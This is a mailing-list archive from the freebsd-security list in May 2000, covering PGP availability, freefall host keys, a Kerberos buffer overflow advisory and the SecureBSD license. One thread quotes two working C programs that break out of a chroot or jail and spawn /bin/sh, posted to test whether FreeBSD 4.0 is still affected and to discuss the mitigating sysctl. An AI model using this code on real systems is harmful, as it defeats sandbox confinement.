Right now the device handling prevents multiple read-only mounts of the same partition in multiple places. This is unfortunate, but I understand that Poul-Henning Kamp's changes to the bio/device management will address this, among other things. That said, it would be more efficient to make use of some sort of name space translation (assuming our VFS could do it) as you could allow greater reuse of storage/management resources. I assume the buffer cache would be shared between the two in the multi-mount case, but not the vnodes. That might also be the case in the namespace translation instance, so it may be lose-lose in both situations.
Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 8: 7:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.xox.pl (xox.pl [212.244.220.62]) by hub.freebsd.org (Postfix) with SMTP id 08F0137B6E3 for ; Thu, 18 May 2000 08:07:14 -0700 (PDT) (envelope-from noxious@xox.pl) Received: (qmail 15774 invoked by uid 5429); 18 May 2000 15:09:56 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 18 May 2000 15:09:56 -0000 Date: Thu, 18 May 2000 17:09:55 +0200 (CEST) From: noxious noxious To: freebsd-security@FreeBSd.ORG Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 8:32:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 827C437B6E3 for ; Thu, 18 May 2000 08:32:12 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id LAA29643; Thu, 18 May 2000 11:31:54 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Thu, 18 May 2000 11:31:53 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Martin Machacek Cc: security@FreeBSD.org Subject: Re: HEADS UP: New host key for freefall! 
In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 18 May 2000, Martin Machacek wrote: > On 17-May-00 Garrett Wollman wrote: > > Perhaps all the FreeBSD people are using either 2.6.2 or GnuPG, so > > they really don't care whether the commercial product exists or not. > > I use GnuPG, personally, since then I don't have to worry about any > > licensing issues at all. > > I'm using Linux version of PGP 6.5.2 on FreeBSD 3.3 without any > problems. Maybe that's another reason ... For all interested: I contacted the appropriate NAI/PGP developers to find out about a native FreeBSD build a few weeks ago. The response was that they have seen zero (0) demand for a FreeBSD build, and therefore don't believe there is a substantial market to support a porting effort. I would tend to believe it's one of these, ``If you don't build it, they won't come'' kind of things, as well as that the communication channels between sales and development on that side are quite weak--prior to joining NAI, I spent literally hours on the phone trying to register my copy of PGP and failed to give them money :-(. However, I think an organized campaign here would make a difference--if your company has an NAI/PGP sales rep, let them know that you're interested in a native FreeBSD build. In particular, let them know if you are willing to spend money--there's no point in building a visible demand that falls through on the sales side, making it less likely to happen next time :-). 
Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 8:54:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id D128637B50D for ; Thu, 18 May 2000 08:54:41 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA05366; Thu, 18 May 2000 11:54:31 -0400 (EDT) (envelope-from wollman) Date: Thu, 18 May 2000 11:54:31 -0400 (EDT) From: Garrett Wollman Message-Id: <200005181554.LAA05366@khavrinen.lcs.mit.edu> To: Wes Peters Cc: security@FreeBSD.org Subject: CAs (was: Re: HEADS UP: New host key for freefall!) In-Reply-To: <3923A26C.2E61D1E1@softweyr.com> References: <200005171951.PAA15001@khavrinen.lcs.mit.edu> <3923A26C.2E61D1E1@softweyr.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Right. Our needs are relatively simple: > o Generate and keep safe a CA key. Sure. > o Sign a certificate request for each committer. I don't see that this is necessary or useful. > o Generate and keep safe a certificate for each "hat". Generate and keep safe a *key* for each role account. The certificate itself is by design public knowledge. > o Be able to transfer certificates from one person to another when a > new head fills a "hat". Again, s/certificate/key/g. > There is a lot more than email to be considered here. New SSH keys > for freefall could be much more easily posted on a secure web page > than emailed to the whole world. But doing so wouldn't prove anything. 
In a case like this, the new key needs to be vouched for by a specific person: the person who installed the new key (in this case, the root@FreeBSD.org role account). In such a circumstance, X.509 has little advantage and lots of unnecessary complexity and cost over something like PGP. -GAWollman -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 10: 3: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from srh0902.urh.uiuc.edu (srh0902.urh.uiuc.edu [130.126.76.224]) by hub.freebsd.org (Postfix) with SMTP id 57E3E37BC87 for ; Thu, 18 May 2000 10:02:43 -0700 (PDT) (envelope-from ftobin@uiuc.edu) Received: (qmail 8630 invoked by uid 1000); 18 May 2000 17:02:39 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 18 May 2000 17:02:39 -0000 Date: Thu, 18 May 2000 12:02:39 -0500 (CDT) From: Frank Tobin X-Sender: ftobin@srh0902.urh.uiuc.edu To: security@FreeBSD.ORG Subject: Re: HEADS UP: New host key for freefall! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert Watson, at 11:31 -0400 on Thu, 18 May 2000, wrote: > However, I think an organized campaign here would make a difference--if > your company has an NAI/PGP sales rep, let them know that you're > interested in a native FreeBSD build. In particular, let them know if you > are willing to spend money--there's no point in building a visible demand > that falls through on the sales side, making it less likely to happen next > time :-). Currently, GnuPG is probably a more acceptable open source OpenPGP implementation than NAI's PGP. The fact that it is totally unencumbered by patents and developed outside the US is good for any import-export quirks. 
-- Frank Tobin http://www.uiuc.edu/~ftobin/ "To learn what is good and what is to be valued, those truths which cannot be shaken or changed." Myst: The Book of Atrus

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 18 13:22: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from ctg-nt.ctg.albany.edu (ctg-nt.ctg.albany.edu [169.226.80.32]) by hub.freebsd.org (Postfix) with ESMTP id 5737537B51E for ; Thu, 18 May 2000 13:22:03 -0700 (PDT) (envelope-from dwerthmu@ctg.albany.edu) Received: by ctg-nt.ctg.albany.edu with Internet Mail Service (5.5.2650.21) id ; Thu, 18 May 2000 16:24:10 -0400 Message-ID: <7A71D0D43B9ED1119EC10008C756C3042F7717@ctg-nt.ctg.albany.edu> From: Derek Werthmuller To: security@FreeBSD.ORG Subject: Any Advisory for the recent Kerberos 5 buffer overflow ? Date: Thu, 18 May 2000 16:24:10 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

See yesterday's CERT advisory.

Systems Affected
  Systems running services authenticated via Kerberos 4
  Some systems running services authenticated via Kerberos 5
  Systems running the Kerberized remote shell daemon (krshd)
  Systems with the Kerberos 5 ksu utility installed
  Systems with the Kerberos 5 v4rcp utility installed

Derek Werthmuller
Center for Technology in Government

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 18 13:26: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0998F37B914; Thu, 18 May 2000 13:26:05 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with
ESMTP id NAA63740; Thu, 18 May 2000 13:26:04 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 18 May 2000 13:25:49 -0700 (PDT) From: Kris Kennaway To: Derek Werthmuller Cc: security@FreeBSD.ORG Subject: Re: Any Advisory for the recent Kerberos 5 buffer overflow ? In-Reply-To: <7A71D0D43B9ED1119EC10008C756C3042F7717@ctg-nt.ctg.albany.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

I'm going to try and get a formal advisory written tonight, but in the meantime here's what I sent to bugtraq:

On Tue, 16 May 2000, Jeffrey I. Schiller wrote:
> SUMMARY:
>
> Serious buffer overrun vulnerabilities exist in many implementations
> of Kerberos 4, including implementations included for backwards
> compatibility in Kerberos 5 implementations. Other less serious
> buffer overrun vulnerabilities have also been discovered. ALL KNOWN
> KERBEROS 4 IMPLEMENTATIONS derived from MIT sources are believed to be
> vulnerable.

For some reason CERT only gave the FreeBSD Security Officer team less than 5 hours last night (from 5:30PM EST when we were sent the draft to 10:30PM EST when their advisory was released) to respond with vendor status, so let me repeat it here for curious Bugtraq readers wondering why we were absent from the advisory:

FreeBSD is not vulnerable by default: Kerberos is not installed by default, and the base system uses KTH Kerberos, not MIT Kerberos, which is not believed to be vulnerable. We do include a port of MIT Kerberos 5 in the FreeBSD Ports Collection which was vulnerable, but has been patched to address the known problems (from patches posted here and in the initial advisory). All users who have chosen to install the /usr/ports/security/krb5 port should immediately update their ports collection and reinstall the port.
Kris
FreeBSD Ports Security Officer
- ----
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Comment: Made with pgp4pine 1.74
Charset: noconv

iQCVAwUBOSRR3FUuHi5z0oilAQG3UwQAjXCROQrnzpY2HoVmDeazrf8Pp5FmUYcH
+8nAIYGo743vq1W04/uhatH66m9kYva2amt5fCG0ZdbWaGyziuEun4giXHVazoA+
cGYMefK+vHcfoY6N8DvRKmsEIE7p/S1JudGv6YHq6OGvw3mjUNWWkOL99GPPXmiD
5892ZWdWQlU=
=SW+k
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 18 14:44:34 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 48FBF37B8D7; Thu, 18 May 2000 14:44:32 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id OAA73498; Thu, 18 May 2000 14:44:32 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Thu, 18 May 2000 14:44:20 -0700 (PDT)
From: Kris Kennaway
To: Derek Werthmuller
Cc: security@FreeBSD.ORG
Subject: Re: Any Advisory for the recent Kerberos 5 buffer overflow ?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 18 May 2000, Kris Kennaway wrote:

> I'm going to try and get a formal advisory written tonight, but in the
> meantime here's what I sent to bugtraq:

An addendum: Robert Watson pointed out to me that FreeBSD used to use a
closely-derived version of MIT Kerberos called eBones to provide Kerberos
functionality. Looking at the CVS history, it seems that FreeBSD 2.2 systems
from before 1998 (i.e. 2.2.5-RELEASE and earlier) may be vulnerable to this
problem if you installed the eBones (Kerberos) distribution. If anyone still
has such a system in production you're strongly advised to upgrade it at
least to 2.2.8-STABLE (2.2.6-RELEASE replaced eBones with KTH Kerberos).
Note however that 2.2 systems are no longer officially supported for
security fixes and not all such fixes are backported (3.4 and later are the
only supported releases).

Kris
- ----
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Comment: Made with pgp4pine 1.74
Charset: noconv

iQCVAwUBOSRkQFUuHi5z0oilAQEivQP9EizKCIUkxiqk/7cakvBjU4ABL94yLXUk
+iW78qAvFnNTa/jNUPn+namQ2e/ddqUX+EJS7ZAjni2lcaXQFAwnFVLYtuwf+g9k
olMPfyJR/pb4hdXGYsMeH+WqskF44vNQjVESBBL/CLT4kBPY0+JhFIpN1F4zi/Z6
uby/UyNvQ8c=
=T5q2
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu May 18 14:47:48 2000
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 3EFB937BA9E for ; Thu, 18 May 2000 14:47:43 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.3) with ESMTP id XAA02782; Thu, 18 May 2000 23:20:41 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Harold Gutch
Cc: Cy Schubert - ITSD Open Systems Group , Paul Hart , Adam Laurie , freebsd-security@freebsd.org
Subject: Re: envy.vuurwerk.nl daily run output
In-reply-to: Your message of "Fri, 12 May 2000 20:06:19 +0200." <20000512200619.A14067@foobar.franken.de>
Date: Thu, 18 May 2000 23:20:41 +0200
Message-ID: <2780.958684841@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Please check the action of the "kern.chroot_allow_open_directories" for
a deeper explanation of this one. It is not set to zero for fear of
compatibility issues. Maybe we should set it to zero in -current to see
if there are any such issues.

Poul-Henning

In message <20000512200619.A14067@foobar.franken.de>, Harold Gutch writes:
>On Fri, May 12, 2000 at 06:19:06AM -0700, Cy Schubert - ITSD Open Systems Group wrote:
>> chrooted environment including jail, however testing the break out of
>> jail exploit (good thing I tested before I spoke), which BTW worked on
>> FreeBSD-3 and numerous other platforms including Linux, Solaris, and
>> Tru64-UNIX, appears to no longer work under 4.0 -- which is a good
>> thing! When did the FreeBSD chroot(2) get fixed?
>>
>> Once again FreeBSD leads the way.
>>
>> Following is the break-out-of-jail code.
>>
>> #include <assert.h>
>> #include <unistd.h>
>>
>> const char *shell = "/bin/sh";
>> const char *lowerdir = "/tmp";
>>
>> int main() {
>>     int i;
>>
>>     assert(chdir("/") != -1);
>>     assert(chroot(lowerdir) != -1);
>>     for (i = 0; i < 32; i++)
>>         assert(chdir("..") != -1);
>>     assert(chroot(".") != -1);
>>
>>     assert(execl(shell, shell, NULL) != -1);
>> }
>
>
>What about the "other" chroot-breakout, does it still work under
>FreeBSD 4.0?
>Here's the breakout-code modulo checks whether /tmp exists etc.
>
>#include <fcntl.h>
>#include <stdlib.h>
>#include <unistd.h>
>
>int main(int argc, char *argv[])
>{
>    int handle, i;
>
>    handle = open("/", O_RDONLY);
>    chroot("/tmp");
>    chdir("/");
>    fchdir(handle);
>    for (i = 0; i < 32; i++)
>        chdir("..");
>    chroot(".");
>    chdir("/");
>    system("/bin/sh");
>
>    return 0;
>}
>
>bye,
>  Harold
>
>--
>Someone should do a study to find out how many human life spans have
>been lost waiting for NT to reboot.
>    Ken Deboy on Dec 24 1999 in comp.unix.bsd.freebsd.misc
>

--
Poul-Henning Kamp             | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG               | TCP/IP since RFC 956
FreeBSD coreteam member       | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.

From owner-freebsd-security Thu May 18 23: 6:56 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 2381937BA8D for ; Thu, 18 May 2000 23:06:44 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA92477; Fri, 19 May 2000 00:06:41 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA99294; Fri, 19 May 2000 00:05:52 -0600 (MDT)
Message-Id: <200005190605.AAA99294@harmony.village.org>
To: Poul-Henning Kamp
Subject: Re: envy.vuurwerk.nl daily run output
Cc: Harold Gutch , Cy Schubert - ITSD Open Systems Group , Paul Hart , Adam Laurie , freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Thu, 18 May 2000 23:20:41 +0200." <2780.958684841@critter.freebsd.dk>
References: <2780.958684841@critter.freebsd.dk>
Date: Fri, 19 May 2000 00:05:52 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <2780.958684841@critter.freebsd.dk> Poul-Henning Kamp writes:
: Please check the action of the "kern.chroot_allow_open_directories"
: for a deeper explanation of this one. It is not set to zero for
: fear of compatibility issues. Maybe we should set it to zero in
: -current to see if there are any such issues.

Go for it. If anything substantial breaks, we can see what's less
painful, compatibility or fixing.

Warner

From owner-freebsd-security Sat May 20 7:59:36 2000
Delivered-To: freebsd-security@freebsd.org
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 7A6BA37B6C9 for ; Sat, 20 May 2000 07:59:30 -0700 (PDT) (envelope-from jwyatt@rwsystems.net)
Received: from bsdie.rwsystems.net([209.197.223.2]) (1251 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Sat, 20 May 2000 09:51:23 -0500 (CDT) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Aug-7)
Date: Sat, 20 May 2000 09:51:19 -0500 (CDT)
From: James Wyatt
To: Martin Machacek
Cc: security@FreeBSD.org
Subject: Re: HEADS UP: New host key for freefall!
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 18 May 2000, Martin Machacek wrote:
> On 17-May-00 Garrett Wollman wrote:
> > Perhaps all the FreeBSD people are using either 2.6.2 or GnuPG, so
> > they really don't care whether the commercial product exists or not.
> > I use GnuPG, personally, since then I don't have to worry about any
> > licensing issues at all.
>
> I'm using Linux version of PGP 6.5.2 on FreeBSD 3.3 without any
> problems. Maybe that's another reason ...

A while back we looked through their web site and tried to figure out how
to order PGP for AIX, FreeBSD, and NT. At the time it wasn't too obvious.
Has that changed? Could someone tell me the cost? Please reply via direct
mail, this is getting way OT... - Thanks - Jy@

From owner-freebsd-security Sat May 20 12:36:45 2000
Delivered-To: freebsd-security@freebsd.org
Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 208B337B50C for ; Sat, 20 May 2000 12:36:44 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id MAA90500 for ; Sat, 20 May 2000 12:39:09 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
To: security@freebsd.org
Subject: The SecureBSD stuff is now available for download
Date: Sat, 20 May 2000 12:39:09 -0700
Message-ID: <90497.958851549@localhost>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

http://www.securebsd.com/download.html

JFYI - we should probably look at what they've done.

- Jordan

From owner-freebsd-security Sat May 20 12:41:11 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4A42F37B677; Sat, 20 May 2000 12:41:07 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id MAA73424; Sat, 20 May 2000 12:41:07 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Sat, 20 May 2000 12:41:06 -0700 (PDT)
From: Kris Kennaway
To: "Jordan K. Hubbard"
Cc: security@freebsd.org
Subject: Re: The SecureBSD stuff is now available for download
In-Reply-To: <90497.958851549@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 20 May 2000, Jordan K. Hubbard wrote:

> http://www.securebsd.com/download.html
>
> JFYI - we should probably look at what they've done.

Actually, we shouldn't, because the license will contaminate any derived
work.

Kris
----
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Sat May 20 12:49:11 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 51A5037B631; Sat, 20 May 2000 12:49:08 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id MAA74288; Sat, 20 May 2000 12:49:08 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Sat, 20 May 2000 12:49:08 -0700 (PDT)
From: Kris Kennaway
To: "Jordan K. Hubbard"
Cc: security@freebsd.org
Subject: Re: The SecureBSD stuff is now available for download
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 20 May 2000, Kris Kennaway wrote:

> > http://www.securebsd.com/download.html
> >
> > JFYI - we should probably look at what they've done.
>
> Actually, we shouldn't, because the license will contaminate any derived
> work.

More to the point, we're not *allowed* to make any derived works..it's a
pretty nasty license.

Kris
----
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Sat May 20 12:53: 8 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.enteract.com (mail.enteract.com [207.229.143.33]) by hub.freebsd.org (Postfix) with ESMTP id 8077437B6E9; Sat, 20 May 2000 12:52:59 -0700 (PDT) (envelope-from bitsurfr@enteract.com)
Received: from bugsbunny (216-80-34-42.d.enteract.com [216.80.34.42]) by mail.enteract.com (8.9.3/8.9.3) with SMTP id OAA38598; Sat, 20 May 2000 14:52:57 -0500 (CDT) (envelope-from bitsurfr@enteract.com)
From: "Chris Silva"
To: "Kris Kennaway" , "Jordan K. Hubbard"
Cc:
Subject: RE: The SecureBSD stuff is now available for download
Date: Sat, 20 May 2000 14:52:26 -0500
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To:
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cripes - they are using what I use for a desktop image... I wonder if
they have the authority to use that image...

- -----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway
Sent: Saturday, May 20, 2000 2:41 PM
To: Jordan K. Hubbard
Cc: security@freebsd.org
Subject: Re: The SecureBSD stuff is now available for download

On Sat, 20 May 2000, Jordan K. Hubbard wrote:

> http://www.securebsd.com/download.html
>
> JFYI - we should probably look at what they've done.

Actually, we shouldn't, because the license will contaminate any derived
work.

Kris
- ----
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2
Comment: FreeBSD, NetBSD, OpenBSD, and BSDi - There's nuthin' else.

iQA/AwUBOSbs+YYwDkcZSgMYEQIrZQCfaEIkk/ydUMuJPxyk0OUfwF8bHZoAn0lH
gKgoU1UpRAXRARoAXhzEpEPH
=xUYp
-----END PGP SIGNATURE-----

From owner-freebsd-security Sat May 20 13:16:31 2000
Delivered-To: freebsd-security@freebsd.org
Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id B04F437B6A1; Sat, 20 May 2000 13:16:28 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id NAA90711; Sat, 20 May 2000 13:18:54 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
To: Kris Kennaway
Cc: "Jordan K. Hubbard" , security@FreeBSD.org
Subject: Re: The SecureBSD stuff is now available for download
In-reply-to: Your message of "Sat, 20 May 2000 12:41:06 PDT."
Date: Sat, 20 May 2000 13:18:54 -0700
Message-ID: <90708.958853934@localhost>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Actually, we shouldn't, because the license will contaminate any derived
> work.

Hmmm. I just read the license agreement (thanks for the prod) and I have
to agree that it looks pretty scary. Still, most things in the security
arena are "obvious" enough that one could just as easily get sued by
someone claiming infringement whether you ever looked at their code or
not. I don't think anyone since AT&T has tried to argue the
"contamination" angle, they just sue you for infringing their ideas
whether you were ever acquainted with those ideas before or not.

In other words, we're probably already screwed from a strictly legal
perspective, and I'm not even just talking about security. I wonder how
many patents we're infringing without even knowing about it. :)

- Jordan

From owner-freebsd-security Sat May 20 13:25:46 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.enteract.com (mail.enteract.com [207.229.143.33]) by hub.freebsd.org (Postfix) with ESMTP id CBA5237B6F2; Sat, 20 May 2000 13:25:43 -0700 (PDT) (envelope-from bitsurfr@enteract.com)
Received: from bugsbunny (216-80-34-42.d.enteract.com [216.80.34.42]) by mail.enteract.com (8.9.3/8.9.3) with SMTP id PAA41840; Sat, 20 May 2000 15:25:41 -0500 (CDT) (envelope-from bitsurfr@enteract.com)
From: "Chris Silva"
To: "Jordan K. Hubbard" , "Kris Kennaway"
Cc:
Subject: RE: The SecureBSD stuff is now available for download
Date: Sat, 20 May 2000 15:25:04 -0500
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <90708.958853934@localhost>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Jordan K. Hubbard
Sent: Saturday, May 20, 2000 3:19 PM
To: Kris Kennaway
Cc: Jordan K. Hubbard; security@FreeBSD.org
Subject: Re: The SecureBSD stuff is now available for download

- -> Snip...

!In other words, we're probably already screwed from a strictly legal
!perspective, and I'm not even just talking about security. I wonder
!how many patents we're infringing without even knowing about it. :)
!
!- Jordan

Yikes!!! Just what we need to hear...

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2
Comment: FreeBSD, NetBSD, OpenBSD, and BSDi - There's nuthin' else.

iQA/AwUBOSb0n4YwDkcZSgMYEQIG4ACeLYalzQz1p3olNfYLIjUd/butqm4An1Sh
tRc0wkSwGEdVV1uC3mrkoGG+
=xwXY
-----END PGP SIGNATURE-----